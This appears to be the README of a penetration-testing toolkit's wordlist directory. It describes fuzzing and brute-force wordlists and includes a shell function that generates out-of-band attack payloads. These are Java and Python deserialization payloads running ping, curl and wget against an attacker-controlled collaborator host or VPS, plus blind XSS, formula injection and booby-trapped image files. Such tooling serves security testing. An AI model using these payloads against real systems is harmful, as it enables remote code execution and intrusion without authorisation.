Skip to content

Latest commit

 

History

History

words

WORDS

This directory contains wordlists of words that I have collected from many different sources and filtered for crimson.

  • 🔻 exp directory

This directory contains wordlists for manual and automatic testing of various known vulnerailities.

  • 🔻 skeleton directory

This directory could help you build your own wordlist for directory brute-forcing.

  • 🔻 BCK_EXT

This wordlist contains various extensions for crimson_backuper

  • 🔻 blank

This is blank wordlist for wfuzz

  • 🔻 bug

This wordlist contains various strings that could make and internal server error or find local file inclusions, path traversals, remote code execution and other known vulnerabilities. It is all around wordlist for manual testing.

  • 🔻 dir

This is wordlist for directory brute-forcing.

  • 🔻 npm_names_10000.txt and npm_names_1mln.txt

This is wordlist for /js/vendor path bruteforcing

  • 🔻 quick.txt

This is wordlist for common directory bruteforcing

  • 🔻 dns

This is wordlist for the subdomain brute-forcing

  • 🔻 dns-altsdns.txt

This is wordlist for altdns mutations

  • 🔻 exp/AUTH_BYPASS

First use "Battering ram" with first 200 lines. Then whole list with sniper as username(admin|your_account), then password(Pa$$P0licy_baby123).

  • 🔻 common_TCP_ports.txt

Top 1,000 TCP Ports: nmap -sT --top-ports 1000 -v -oG -

ALIAS

function words {
    # Java deserialization payload URLDNS (* swap the java path if does not work)
    java -jar "$HOME"/tools/crimson/scripts/GOAST/ysoserial.jar URLDNS "http://$1" | base64 -w0 |sed "s/$/\n/g" > oob.fuzz
    # PYTHON DESERIALIZATION PING CURL WGET
    python3 $HOME/tools/crimson/scripts/pickle_ser.py "ping $1" >> oob.fuzz
    python3 $HOME/tools/crimson/scripts/pickle_ser.py "curl $1/curl_pickle_ser" >> oob.fuzz
    python3 $HOME/tools/crimson/scripts/pickle_ser.py "wget $1/wget_pickle_ser" >> oob.fuzz
    python3 $HOME/tools/crimson/scripts/pickle_ser.py "ping $2" >> oob.fuzz
    if [[ -z "$3" ]]; then
      python3 $HOME/tools/crimson/scripts/pickle_ser.py "curl $2/curl_pickle_ser" >> oob.fuzz
      python3 $HOME/tools/crimson/scripts/pickle_ser.py "wget $2/wget_pickle_ser" >> oob.fuzz
    else
        python3 $HOME/tools/crimson/scripts/pickle_ser.py "curl $2:$3/curl_pickle_ser" >> oob.fuzz
        python3 $HOME/tools/crimson/scripts/pickle_ser.py "wget $2:$3/wget_pickle_ser" >> oob.fuzz
    fi
      # BLIND XSS PAYLOADS
    python3 "$HOME/tools/crimson/scripts/blind_xss_gen.py" "$HOME/tools/crimson/words/exp/BLIND_XSS" "$1" >> oob.fuzz
    if [[ -z "$3" ]]; then
        python3 "$HOME/tools/crimson/scripts/blind_xss_gen.py" "$HOME/tools/crimson/words/exp/BLIND_XSS" "$2" >> oob.fuzz
    else
        python3 "$HOME/tools/crimson/scripts/blind_xss_gen.py" "$HOME/tools/crimson/words/exp/BLIND_XSS" "$2:$3" >> oob.fuzz
    fi
    # Preparing OOB payloadlist and copying it to the clipboard
    cat "$HOME"/tools/crimson/words/exp/OOB | sed "s/domain_collab/$1/g" |sed "s/vps_ip/$2/g" >> oob.fuzz1
    cat oob.fuzz1 | sed "s/$2:80/$2:$3/g" >> oob.fuzz && rm oob.fuzz1
    cat "$HOME"/tools/crimson/words/exp/BLIND_XSS | sed "s/domain_collab/$1/g" >> oob.fuzz
    cat oob.fuzz | clip.exe
    # Preparing other wordlists and files to upload
    cat "$HOME"/tools/crimson/words/bug >> bug.fuzz
    cat "$HOME"/tools/crimson/words/exp/http_leaks | sed "s/domain_collab/$1/g" >> http_leaks
    cat "$HOME"/tools/crimson/words/exp/bypass_ext >> bypass_ext
    cat "$HOME"/tools/crimson/words/exp/spoofing_headers.txt > spoofing_headers.txt
    # Preparing upload
    mkdir upload
    cd upload
    cp "$HOME"/tools/crimson/upload/* .
    cat exiftool.jpg | sed "s/domain_collab/$1/g" >> 123 && mv 123 exiftooldomain.jpg
    cat exiftool.jpg | sed "s/domain_collab/$2:$3/g" >> 123 && mv 123 exiftoolvps.jpg
    cat formula_injections.txt | sed "s/domain_collab/$1/g" |sed "s/vps_ip/$2/g" >> formula_injections1
    cat formula_injections1 | sed "s/$2:80/$2:$3/g" >> formula_injections.txt && rm formula_injections1
    cd ..
}